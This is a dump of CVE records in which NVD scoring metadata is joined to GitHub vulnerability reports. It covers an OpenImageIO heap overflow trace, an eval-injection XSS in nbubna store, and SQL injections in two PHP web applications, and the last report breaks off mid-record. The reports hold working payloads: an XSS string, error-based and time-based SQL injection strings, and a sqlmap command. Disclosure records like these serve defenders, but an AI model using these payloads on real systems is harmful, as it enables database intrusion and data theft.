#3 0x7f85c481b613 in OpenImageIO_v3_1_0::ImageBufImpl::read(int, int, int, int, bool, OpenImageIO_v3_1_0::TypeDesc, bool (*)(void*, float), void*, OpenImageIO_v3_1_0::DoLock) /openimageio/src/libOpenImageIO/imagebuf.cpp:1333
#4 0x7f85c493bd31 in OpenImageIO_v3_1_0::ImageBufImpl::validate_pixels(OpenImageIO_v3_1_0::DoLock) const /openimageio/src/libOpenImageIO/imagebuf.cpp:263
#5 0x7f85c4824645 in OpenImageIO_v3_1_0::ImageBufImpl::pixeladdr(int, int, int, int) /openimageio/src/libOpenImageIO/imagebuf.cpp:3004
#6 0x7f85c4824645 in OpenImageIO_v3_1_0::ImageBuf::pixeladdr(int, int, int, int) const /openimageio/src/libOpenImageIO/imagebuf.cpp:3020
#7 0x7f85c484c78d in OpenImageIO_v3_1_0::ImageBuf::IteratorBase::pos(int, int, int) /openimageio/src/libOpenImageIO/imagebuf.cpp:3405
#8 0x7f85c484fe72 in OpenImageIO_v3_1_0::ImageBuf::IteratorBase::IteratorBase(OpenImageIO_v3_1_0::ImageBuf const&, OpenImageIO_v3_1_0::ROI const&, OpenImageIO_v3_1_0::ImageBuf::WrapMode, bool) /openimageio/src/libOpenImageIO/imagebuf.cpp:3254
#9 0x7f85c41961fb in OpenImageIO_v3_1_0::ImageBuf::ConstIterator<float, float>::ConstIterator(OpenImageIO_v3_1_0::ImageBuf const&, OpenImageIO_v3_1_0::ROI const&, OpenImageIO_v3_1_0::ImageBuf::WrapMode) /openimageio/src/include/OpenImageIO/imagebuf.h:1857
#10 0x7f85c41961fb in operator() /openimageio/src/libOpenImageIO/imagebufalgo_compare.cpp:166
#11 0x7f85c37043f0 in std::function<void (long, long)>::operator()(long, long) const /usr/include/c++/11/bits/std_function.h:590
#12 0x7f85c37043f0 in operator() /openimageio/src/libutil/thread.cpp:647
#13 0x7f85c37043f0 in __invoke_impl<void, OpenImageIO_v3_1_0::parallel_for_chunked(int64_t, int64_t, int64_t, std::function<void(long int, long int)>&&, OpenImageIO_v3_1_0::paropt)::<lambda(int, int64_t, int64_t)>&, int, long int, long int> /usr/include/c++/11/bits/invoke.h:61
#14 0x7f85c37043f0 in __invoke_r<void, OpenImageIO_v3_1_0::parallel_for_chunked(int64_t, int64_t, int64_t, std::function<void(long int, long int)>&&, OpenImageIO_v3_1_0::paropt)::<lambda(int, int64_t, int64_t)>&, int, long int, long int> /usr/include/c++/11/bits/invoke.h:111
#15 0x7f85c37043f0 in _M_invoke /usr/include/c++/11/bits/std_function.h:290
#16 0x7f85c37117e5 in std::function<void (int, long, long)>::operator()(int, long, long) const /usr/include/c++/11/bits/std_function.h:590
#17 0x7f85c37117e5 in OpenImageIO_v3_1_0::parallel_for_chunked_id(long, long, long, std::function<void (int, long, long)>&&, OpenImageIO_v3_1_0::paropt) /openimageio/src/libutil/thread.cpp:632
#18 0x7f85c3713b49 in OpenImageIO_v3_1_0::parallel_for_chunked(long, long, long, std::function<void (long, long)>&&, OpenImageIO_v3_1_0::paropt) /openimageio/src/libutil/thread.cpp:648
#19 0x7f85c41f1957 in computePixelStats_<float> /openimageio/src/libOpenImageIO/imagebufalgo_compare.cpp:161
#20 0x7f85c41f1957 in OpenImageIO_v3_1_0::ImageBufAlgo::computePixelStats(OpenImageIO_v3_1_0::ImageBuf const&, OpenImageIO_v3_1_0::ROI, int) /openimageio/src/libOpenImageIO/imagebufalgo_compare.cpp:203
#21 0x7f85c4b7ca1a in OpenImageIO_v3_1_0::pvt::print_stats(std::ostream&, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >, OpenImageIO_v3_1_0::ImageBuf const&, OpenImageIO_v3_1_0::ImageSpec const&, OpenImageIO_v3_1_0::ROI, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&) /openimageio/src/libOpenImageIO/printinfo.cpp:324
#22 0x5644114bd151 in print_info_subimage /openimageio/src/oiiotool/printinfo.cpp:470
#23 0x5644114c72a7 in OpenImageIO_v3_1_0::OiioTool::print_info(std::ostream&, OpenImageIO_v3_1_0::OiioTool::Oiiotool&, OpenImageIO_v3_1_0::OiioTool::ImageRec*, OpenImageIO_v3_1_0::pvt::print_info_options const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&) /openimageio/src/oiiotool/printinfo.cpp:529
#24 0x5644112ad943 in action_printstats /openimageio/src/oiiotool/oiiotool.cpp:5820
#25 0x564411388f93 in std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>::operator()(OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>) const /usr/include/c++/11/bits/std_function.h:590
#26 0x564411388f93 in OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}::operator()(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>) const /openimageio/src/include/OpenImageIO/argparse.h:536
#27 0x564411388f93 in void std::__invoke_impl<void, OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul> >(std::__invoke_other, OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>&&) /usr/include/c++/11/bits/invoke.h:61
#28 0x564411388f93 in std::enable_if<is_invocable_r_v<void, OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul> >, void>::type std::__invoke_r<void, OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul> >(OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>&&) /usr/include/c++/11/bits/invoke.h:111
#29 0x564411388f93 in std::_Function_handler<void (OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>), OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}>::_M_invoke(std::_Any_data const&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>&&) /usr/include/c++/11/bits/std_function.h:290
#30 0x7f85c34e0abc in std::function<void (OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>::operator()(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>) const /usr/include/c++/11/bits/std_function.h:590
#31 0x7f85c34e0abc in OpenImageIO_v3_1_0::ArgParse::Impl::parse_args(int, char const**) /openimageio/src/libutil/argparse.cpp:514
#32 0x7f85c34e42db in OpenImageIO_v3_1_0::ArgParse::parse_args(int, char const**) /openimageio/src/libutil/argparse.cpp:429
#33 0x56441137a01b in OpenImageIO_v3_1_0::OiioTool::Oiiotool::getargs(int, char**) /openimageio/src/oiiotool/oiiotool.cpp:6979
#34 0x5644110ff5a1 in main /openimageio/src/oiiotool/oiiotool.cpp:7338
#35 0x7f85c2f43d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
SUMMARY: AddressSanitizer: heap-buffer-overflow /openimageio/src/include/OpenImageIO/fmath.h:983 in float OpenImageIO_v3_1_0::convert_type<float, float>(float const&)
Shadow bytes around the buggy address:
0x0c0480002880: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa
0x0c0480002890: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fd fd
0x0c04800028a0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fa
0x0c04800028b0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c04800028c0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
=>0x0c04800028d0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa 00[01]
0x0c04800028e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c04800028f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0480002900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0480002910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0480002920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==660139==ABORTING
```
### Environment
```
ubuntu:22.04
gcc version 11.4.0 (Ubuntu 11.4.0-1ubuntu1~22.04)
clang version 14.0.0-1ubuntu1.1
afl-fuzz++4.22a
```
*Thanks* *for* *your* *time*! | [BUG]heap-buffer-overflow at src/include/OpenImageIO/fmath.h:983 in openimageio | https://api.github.com/repos/AcademySoftwareFoundation/OpenImageIO/issues/4552/comments | 0 | 2024-12-02T11:12:32Z | 2024-12-10T00:02:41Z | https://github.com/AcademySoftwareFoundation/OpenImageIO/issues/4552 | 2,711,539,849 | 4,552 | 6,519 |
CVE-2024-57556 | 2025-01-23T22:15:15.277 | Cross Site Scripting vulnerability in nbubna store v.2.14.2 and before allows a remote attacker to execute arbitrary code via the store.deep.js component | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
],
"url": "https://github.com/nbubna/store/issues/127"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nbubna:store:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A9CD1CC5-48E3-477E-A0DB-FE6340F1939C",
"versionEndExcluding": null,
"versionEndIncluding": "2.14.2",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/nbubna/store/issues/127 | [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
] | github.com | [
"nbubna",
"store"
] | Opening this issue since no security policy is defined.
## Exploit
Because at line 31, `eval` is used to get the value of the key id, it is possible for an attacker to cause XSS if the parameter of `store.get` is user-controlled.
```js
store.set('someKey', 'test');
store.get('someKey.key;alert(1337)');
```

## Impact
This has the general security implications any XSS would have allowing attackers to potentially steal cookies, perform actions etc.
Even though the `store.deep.js` extension is marked with ALPHA status lots of sites and repos can be found using it. I think marking this as a valid bug makes sense since the impact is not entirely trivial.


## Mitigation
We can remove `eval` completely and resolve the object path by splitting the string by dots.
```js
;(function(_) {
// save original core accessor
var _get = _.get;
// replace with enhanced version
_.get = function(area, key, kid) {
var s = _get(area, key);
if (s == null) {
var parts = _.split(key);
if (parts) {
key = parts[0];
kid = kid ? parts[1] + '.' + kid : parts[1];
return _.get(area, parts[0], kid);
}
} else if (kid) {
try {
var val = _.parse(s);
val = _.resolvePath(val, kid);
s = _.stringify(val);
} catch (e) {
console.error("Error accessing nested property:", e);
return null;
}
}
return s;
};
// Helper function to resolve nested paths safely
_.resolvePath = function(obj, path) {
return path.split('.').reduce((acc, key) => acc && acc[key], obj);
};
// expose internals on the underscore to allow extensibility
_.split = function(key) {
var dot = key.lastIndexOf('.');
if (dot > 0) {
var kid = key.substring(dot+1, key.length);
key = key.substring(0, dot);
return [key, kid];
}
};
})(window.store._);
```
I can open a PR with this patch as soon as this bug get's confirmed
| XSS by eval injection on store.deep.js | https://api.github.com/repos/nbubna/store/issues/127/comments | 3 | 2024-12-26T17:45:59Z | 2024-12-26T22:20:36Z | https://github.com/nbubna/store/issues/127 | 2,760,000,352 | 127 | 6,520 |
CVE-2025-0803 | 2025-01-29T02:15:27.723 | A vulnerability, which was classified as critical, has been found in Codezips Gym Management System 1.0. Affected by this issue is some unknown functionality of the file /dashboard/admin/submit_plan_new.php. The manipulation of the argument planid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit"
],
"url": "https://github.com/alc9700jmo/CVE/issues/8"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.293924"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.293924"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.485218"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gymmanagementsystem:gym_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "01FDAF8D-109B-4410-8BBC-174097B1B64C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/alc9700jmo/CVE/issues/8 | [
"Exploit"
] | github.com | [
"alc9700jmo",
"CVE"
] | # **Security Advisory: SQL Injection in Gym Management System (PHP) v1.0**
**Discovered By:** alc9700
---
## **1. Affected Product**
- **Product Name**: Gym Management System in PHP with Source Code
- **Version**: v1.0
- **Vulnerable File**: `/dashboard/admin/submit_plan_new.php`
- **Parameter**: `planid`
- **Vendor Homepage**: [Gym Management System](https://codezips.com/php/gymmanagementsytem/)
- **Download Link**: [Source Code](https://codeload.github.com/codezips/gym-management-system-php/zip/master)
**No authentication required** to exploit this vulnerability.
---
## **2. Overview**
A critical SQL injection vulnerability exists in the `planid`parameter within `/dashboard/admin/submit_plan_new.php`. Attackers can inject arbitrary SQL code via specially crafted values, bypassing input validation. This could lead to unauthorized database access, data manipulation, and potentially full system compromise.
---
## **3. Technical Details**
### **3.1 Vulnerability Type**
- **SQL Injection**
- Error-based
- Time-based blind
### **3.2 Sample Payloads**
```bash
# error-based
planid=TOIQMN' AND EXTRACTVALUE(8373,CONCAT(0x5c,0x7178716271,(SELECT (ELT(8373=8373,1))),0x716b767671)) AND 'RRpL'='RRpL&planname=111&desc=111&planval=3&amount=111&submit=CREATE PLAN
# time-based blind
planid=TOIQMN' RLIKE SLEEP(5) AND 'BTbb'='BTbb&planname=111&desc=111&planval=3&amount=111&submit=CREATE PLAN
```
### **3.3 Proof of Concept (PoC)**
```bash
sqlmap -u "192.168.10.5:2227/dashboard/admin/submit_plan_new.php" -cookie="PHPSESSID=pmh8l5gk2bosgie133cdhbps4a" --data="planid=TOIQMN&planname=111&desc=111&planval=3&amount=111&submit=CREATE+PLAN" --batch --level=5 --risk=3
```
**Screenshots**:
<img width="1107" alt="Image" src="https://github.com/user-attachments/assets/3a74b97a-32a3-4001-9972-5ccd92821af7" />
---
## **4. Impact**
- **Database Compromise**: Attackers can read, modify, or delete data.
- **Data Leakage**: Sensitive customer/payment information could be exposed.
- **System Interruption**: Malicious queries may degrade performance or crash the application.
- **Privilege Escalation**: Potential elevation of privileges leading to broader system takeover.
---
## **5. Recommendations**
1. **Use Prepared Statements / Parameter Binding**
- Separate SQL logic from user-supplied data to prevent code injection.
2. **Enforce Strict Input Validation**
- Validate and sanitize incoming fields (`name`) against unexpected characters or formats.
3. **Apply the Principle of Least Privilege**
- Configure database users with minimal privileges. Avoid high-privilege accounts for routine queries.
4. **Schedule Regular Security Audits**
- Conduct routine code reviews, penetration testing, and dependency checks to catch new or recurring flaws.
---
## **6. References**
- [Gym Management System Homepage](https://codezips.com/php/gymmanagementsytem/)
- [OWASP: SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
- [sqlmap Project](https://sqlmap.org/)
---
**Disclaimer:**
This advisory is intended for responsible disclosure. Any unauthorized exploitation of the described vulnerability may violate applicable laws. Stakeholders and the vendor are strongly encouraged to apply remediation measures immediately to ensure data protection and maintain system integrity. | Security Advisory: SQL Injection in Gym Management System (PHP) | https://api.github.com/repos/alc9700jmo/CVE/issues/8/comments | 0 | 2025-01-19T10:56:29Z | 2025-01-19T10:56:29Z | https://github.com/alc9700jmo/CVE/issues/8 | 2,797,562,104 | 8 | 6,522 |
CVE-2025-0846 | 2025-01-30T01:15:13.993 | A vulnerability was found in 1000 Projects Employee Task Management System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/AdminLogin.php. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Product"
],
"url": "https://1000projects.org/"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/onupset/CVE/issues/4"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.294009"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.294009"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.485756"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:1000projects:employee_task_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F0B00664-63AD-417B-8FF7-43F08F5162FF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/onupset/CVE/issues/4 | [
"Third Party Advisory"
] | github.com | [
"onupset",
"CVE"
] | # 1000projects Employee Task Management System Web Project using PHP and MYSQL
V1.0 /Employee_Task_Management_System/source-code/PROJECT_NEW/admin/AdminLogin.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Employee Task Management System Web Project using PHP and MYSQL
## Vendor Homepage
+ [homepage]( https://1000projects.org/employee-task-management-system-web-project-using-php-and-mysql.html)
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ onupset
## Vulnerable File
+/Employee_Task_Management_System/source-code/PROJECT_NEW/admin/AdminLogin.php
## VERSION(S)
+ V1.0
# Software Link
+ [Download Source Code]( https://1000projects.org/wp-content/uploads/2022/09/Employee_Task_Management_System.7z)
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the '/Employee_Task_Management_System/source-code/PROJECT_NEW/admin/AdminLogin.php' file of the ' Employee Task Management System Web Project using PHP and MYSQL ' project. The reason for this issue is that attackers inject malicious code from the parameter ' email ' and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
## DESCRIPTION
